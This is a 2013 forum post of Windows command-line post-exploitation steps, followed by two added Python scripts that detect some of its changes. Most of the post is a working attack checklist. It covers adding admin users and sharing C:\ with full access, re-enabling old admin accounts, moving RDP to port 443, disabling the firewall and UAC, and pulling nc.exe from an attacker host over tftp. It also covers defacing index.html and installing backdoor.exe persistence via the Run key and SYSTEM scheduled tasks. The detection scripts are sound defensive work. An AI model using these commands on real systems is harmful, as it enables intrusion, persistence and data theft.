Dr-Hack
#1 Posted : Friday, September 27, 2013 6:48:41 PM(UTC)

A List of useful command line syntax which can be used on servers to find various important information


--------------------------
View Computers, Workgroups & Domains:
--------------------------
NET VIEW
NET VIEW /DOMAIN


List Domain Controllers:
Win2K:
    NETDOM QUERY /D:MyDomain DC
    Find Primary DC:
        NETDOM QUERY /D:MyDomain PDC


Win2k3:
    DSQUERY Server
    Find primary DC: 
        NETDOM QUERY /D:mydomain.com FSMO


----------------------
Check users logged on:
----------------------
NET SESSION | FIND "\\"


WMIC /Node:remotecomputer ComputerSystem Get UserName


Using REG.EXE:
Windows 2000|XP|2k3:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"') DO (SET LoggedinUser=%%B))


Windows 7:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (FOR /F "tokens=2*" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ^| FIND /V ":"') DO (SET LoggedinUser=%%C))


----------
SYSTEMINFO:
----------
systeminfo
net config workstation
tasklist
    taskkill [/f] /pid <pid>
    taskkill [/f] /im <image_name>
qprocess


--------------
schedule tasks:
--------------
echo %time%
at
    at <time+1min> /INTERACTIVE "cmd.exe"
    pops a SYSTEM level shell if not disabled, scheduled tasks can also be used...
schtasks



----------
LIST USERS:
----------
whoami /all
net use
net localgroup
net localgroup <GROUP-NAME>
NET LOCALGROUP Administrators
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Controllers" /domain
net group "Remote Desktop Users"


password policy info:
    net accounts
    net accounts /domain


----------------------------------
Find out Group Membership for user:
----------------------------------
DSQUERY USER -samid <loginname> | DSGET USER -memberof -expand


------------------------------------
Check Directory Permissions for User:
------------------------------------
CD /D d:\directory2check
    SHOWACLS /U:Domain\userid


------------
List Drives:
------------
fsutil fsinfo drives


------------
List Shares:
------------
net share


---------------
Reset User Pass:
---------------
NET USER <loginname> <newpassword> /DOMAIN


on Srv2k3:
DSQUERY USER -samid <loginname> | DSMOD USER -pwd <newpassword>


Now make sure password never expires:
WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE"


-------------------------
ADD USER + RDP ENABLEMENT:
-------------------------
net user <USER-NAME> <PASS> /add
net localgroup administrators <USER-NAME> /add
net localgroup "Remote Desktop Users" <USER-NAME> /add
net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited
    shares C drive and grants unlimited access to it for our new admin user....


***If the server is a member of a domain, we can go a step further and add a domain level user rather than a local one. This will have more reach within the organisation than a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after the first command above to add at domain level in addition to local level


re-enable a disabled account (perhaps an old admin account ;) ):
    net user username /active:yes /domain


-------------------------------------------------------------------------------
Tunnel RDP out on another port besides default port 3389, port 443 in this case:
-------------------------------------------------------------------------------
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f


Simply change back to 3389 to return to the default port. If you need to check whether a port is already in use or not you can use a quick netstat -an | find "<port#>"


**May need a restart or RDP Service restart to take effect


--------------
Firewall Info:
--------------
If you want to find out general info about the firewall, use this:
    netsh firewall show opmode


See list of port openings:
    netsh firewall show portopening


Add port opening in firewall, for port 455 for any service or program to use:
    netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL


Turn off built-in Windows firewall:
    netsh firewall set opmode disable
or
    SC [ \\Remote_computer ] Stop SharedAccess
    SC [ \\Remote_computer ] Config SharedAccess start= disabled


---------------------
NetCat File Transfers:
---------------------
Push a file from client to listener:
ncat -lv [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]


Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]


--------------------
TFTP File Transfers:
--------------------
If it is not enabled, follow these 4 quick steps:
1 =>    copy %windir%\system32\dllcache\tftpd.exe %windir%\system32
2 =>    sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto
        Should see: "[SC] CreateService SUCCESS"
3 =>    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp"
4 =>     net start tftpdsvc


tftp [-i] [Host] [{get | put}] [Source] [Destination]


    -i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file is transferred in one-byte units. Use this mode when transferring binary files. If -i is omitted, the file is transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to an appropriate format for the specified computer. Use this mode when transferring text files. If a file transfer is successful, the data transfer rate is displayed.


    Host: Specifies the local or remote computer.


    put: Transfers the file Destination on the local computer to the file Source on the remote computer. Because the TFTP protocol does not support user authentication, the user must be logged onto the remote computer, and the files must be writable on the remote computer.


    get: Transfers the file Destination on the remote computer to the file Source on the local computer.


    Source: Specifies the file to transfer.


    Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have the same name as Source.


    /?: Displays help at the command prompt. 


EXAMPLES (ATTACKER=.21 && TARGET=.30):
tftp 192.168.1.30 GET /home/hood3drob1n/defaced.html index.html
    This will transfer the local file "defaced.html" from local to remote server and will re-name the file as index.html on the remote server, which was identified as 192.168.1.30


tftp -i 192.168.1.21 GET /home/hood3drob1n/evil/nc.exe
    This will grab a copy of nc.exe from 192.168.1.21


tftp -i 192.168.1.30 PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe
    This will copy local file nc.exe to the server at 192.168.1.30
 
If facing newer Windows Systems (Vista, 7, or Srv2008) you might need to disable CTCP protection to get TFTP working, as CTCP has been known to cause issues with timeouts (not implemented in Linux or Windows XP)
    To disable enter this command: netsh interface tcp set global congestionprovider=none


TFTP Not enabled due to being newer system? No problem, re-enable using DISM ;)
dism (Deployment Image Servicing and Management Technical) allows command line control of services, I do it via a DOS script, but this is the key:
    dism /online /Enable-Feature /FeatureName:TelnetClient
    dism /online /Enable-Feature /FeatureName:TFTP



-----------------------
CMD FTP Remote Download:
-----------------------
echo open <site.com> > ftpscript.txt    (Optional, but if omitted the host/ip needs to be specified after script name in -s argument to identify target host properly)
echo <USER> >> ftpscript.txt
echo <PASS> >> ftpscript.txt
echo binary >> ftpscript.txt    (If next line points to a .exe use this line, otherwise not needed)
echo get <FILE> >> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt



----------------------------
Set Backdoor w/Firewall hole:
----------------------------
1)
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
2)
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3)
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe"  /ED 12/12/2012



--------------
Services Info:
--------------
To delete a Windows Service, simply use the Service Control, or "sc", command with the delete argument followed by the Service name
    sc delete <ServiceName>
        Use quotes if spaces in name: 
        sc delete "Apple Mobile Device"


You can use SC to query for all configured services on the box with simple command:
    sc query
or
    NET START


All Services on windows can be found under this registry key: 
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services


Start/Pause/Stop/Continue a Service
    SC <ServerName> Start|Pause|Stop|Continue <ServiceName>
        You can omit the server name and it assumes localhost, but you can also leverage this to interact with other systems' services if you have elevated privileges
    SC Stop Scheduler
    SC Start Messenger
    SC \\W2k3SRV Pause W3Svc
    SC \\192.168.1.10 Continue NTfrs


----------------------
Disable UAC in Vista+:
----------------------
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f


Essentially we just set this registry key
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
        EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC


-----------------
REGISTRY EDITING:
-----------------
--------------------------------------------
Query for a specific Value of a Registry Key:
--------------------------------------------
reg (QUERY, ADD, DELETE, COPY, SAVE, LOAD, UNLOAD, RESTORE, COMPARE, EXPORT, IMPORT (FLAGS)) KEY


reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] 


Check if RDP Enabled or not:
C:\> reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections


    0=Enabled
    1=Disabled


To re-enable RDP:
REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0


If remote registry access is available, you can try tweaking internal machines as well to further pivot:
REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0



The machine typically needs to be rebooted for the change to take effect, so open a command prompt and type the following command:


    shutdown -m \\srv220 -r


----------------------
Interface Device Info:
----------------------
ipconfig /all
ipconfig /displaydns
arp -a
route print
type %WINDIR%\System32\drivers\etc\hosts


------------------
Group Policy Info:
------------------
gpresult /z
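
As an added example from the defender's side (Python written for this page, not code from the post), here is a parser for `reg query` output plus a small rule set that flags the registry settings the post changes: fDenyTSConnections (RDP allowed), the RDP-Tcp PortNumber moved off 3389, EnableLUA=0 (UAC disabled), and entries under the Run key. The sample `reg query` output is constructed; the label-versus-executable check on autoruns is a triage heuristic of mine, not a Windows rule.

```python
"""Offline audit of `reg query` output for the registry settings the post touches.

Added example, not code from the post. On a live host you would capture the real
output of, e.g., reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
and feed that text to parse_reg_query(); the sample below is constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the keys from the post, on a host where every one of the
# post's changes (RDP on, RDP moved to 443, UAC off, Run-key autorun) is present.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0x1bb

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    firewall    REG_SZ    c:\windows\system32\backdoor.exe
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
)

RegTree = Dict[str, Dict[str, Tuple[str, str]]]  # key path -> {value name -> (type, data)}


def parse_reg_query(text: str) -> RegTree:
    """Unindented lines are key paths; indented lines are name/TYPE/data
    triples separated by runs of four spaces, as reg.exe prints them."""
    tree: RegTree = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():
            current = raw.strip()
            tree.setdefault(current, {})
            continue
        if current is None:
            continue
        parts = re.split(r"\s{4,}", raw.strip(), maxsplit=2)
        if len(parts) < 2 or not parts[1].startswith("REG_"):
            continue  # not a value line
        tree[current][parts[0]] = (parts[1], parts[2] if len(parts) == 3 else "")
    return tree


def lookup(tree: RegTree, key: str, name: str) -> Optional[Tuple[str, str]]:
    """Case-insensitive lookup, since registry key and value names are."""
    for k, values in tree.items():
        if k.lower() == key.lower():
            for n, entry in values.items():
                if n.lower() == name.lower():
                    return entry
    return None


def dword(data: str) -> int:
    """reg.exe prints REG_DWORD data as 0x-prefixed hex."""
    return int(data, 16) if data.lower().startswith("0x") else int(data)


def executable_of(command: str) -> str:
    """Basename of the program in an autorun command line (quoted or not)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        path = command[1:end] if end > 0 else command[1:]
    else:
        path = command.split()[0] if command else ""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def audit(tree: RegTree) -> List[str]:
    """Apply the rules to a parsed tree and return human-readable findings."""
    findings: List[str] = []
    v = lookup(tree, TS_KEY, "fDenyTSConnections")
    if v and dword(v[1]) == 0:
        findings.append("RDP: fDenyTSConnections=0, Remote Desktop connections are allowed")
    v = lookup(tree, RDP_TCP_KEY, "PortNumber")
    if v and dword(v[1]) != 3389:
        findings.append(f"RDP: listener moved to non-default port {dword(v[1])}")
    v = lookup(tree, UAC_KEY, "EnableLUA")
    if v and dword(v[1]) == 0:
        findings.append("UAC: EnableLUA=0, User Account Control is disabled")
    for run_key in RUN_KEYS:
        for k, values in tree.items():
            if k.lower() != run_key.lower():
                continue
            for name, (_, command) in values.items():
                stem = executable_of(command).rsplit(".", 1)[0].lower()
                # Triage heuristic (my assumption, not a Windows rule): an autorun
                # whose label has nothing to do with its executable deserves a look.
                note = ""
                if stem and name.lower() not in stem and stem not in name.lower():
                    note = " [label does not match executable name]"
                findings.append(f"Autorun: {name} -> {command}{note}")
    return findings


if __name__ == "__main__":
    for line in audit(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print(line)
```

Run as-is it reports the five findings for the constructed sample; on a host where nothing in the post has been applied (fDenyTSConnections=1, PortNumber=3389, EnableLUA=1, empty Run key) it reports nothing. The parser only reads text, so it works equally on output saved from `reg query` against a remote machine via `\\MachineName\HKLM\...`.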

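A second added example (again Python written for this page, not the post's code) covers the scheduled-task persistence the post sets up with `at` and `SCHTASKS /RU "SYSTEM"`: it reads the CSV that `schtasks /query /fo CSV /v` produces and flags tasks that run as a privileged account from a user-writable location. The CSV below is constructed and keeps only a subset of the columns the real command prints; the column names used (TaskName, Task To Run, Run As User, Schedule Type) are the ones schtasks emits, and the path pattern is my own heuristic.

```python
"""Triage of `schtasks /query /fo CSV /v` output for SYSTEM tasks that launch
from user-writable paths. Added example, not code from the post."""
import csv
import io
import re
from typing import Dict, List

# Constructed sample (subset of the /v columns): a stock Windows task, a task
# like the post's SCHTASKS /RU "SYSTEM" entry, and a user's own daily task.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly"
"WS01","\FIREWALL","%USERPROFILE%\backdoor.exe","SYSTEM","Minute"
"WS01","\Backup","C:\Users\alice\backup.cmd","WS01\alice","Daily"
'''

# Accounts whose tasks deserve the strictest review of where the binary lives.
PRIVILEGED = {"system", "nt authority\\system", "local service", "network service"}

# Heuristic (my assumption): locations an ordinary user can write to.
USER_PATH = re.compile(
    r"%userprofile%|%appdata%|%temp%|\\users\\|documents and settings|\\temp\\|\\appdata\\",
    re.IGNORECASE,
)


def is_privileged(run_as: str) -> bool:
    """True for SYSTEM and the two built-in service accounts."""
    return run_as.strip().lower() in PRIVILEGED


def parse_schtasks_csv(text: str) -> List[Dict[str, str]]:
    """Parse the CSV; some schtasks versions repeat the header line before
    each task, so header-looking rows are dropped."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("TaskName") == "TaskName":
            continue
        rows.append(row)
    return rows


def triage_tasks(rows: List[Dict[str, str]]) -> List[str]:
    """One finding per task that runs privileged from a user-writable path."""
    findings = []
    for row in rows:
        run_as = row.get("Run As User", "")
        command = row.get("Task To Run", "")
        if is_privileged(run_as) and USER_PATH.search(command):
            findings.append(
                f"{row.get('TaskName')}: runs as {run_as} every "
                f"{row.get('Schedule Type', '?').lower()} from a user-writable location ({command})"
            )
    return findings


if __name__ == "__main__":
    for line in triage_tasks(parse_schtasks_csv(SAMPLE_SCHTASKS_CSV)):
        print(line)
```

For the constructed sample only `\FIREWALL` is reported: the defrag task runs as SYSTEM but from `%windir%`, and the backup task lives under a user profile but runs as that user. `at`-created jobs also appear in `schtasks` output on the systems the post targets, so the same triage covers both.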
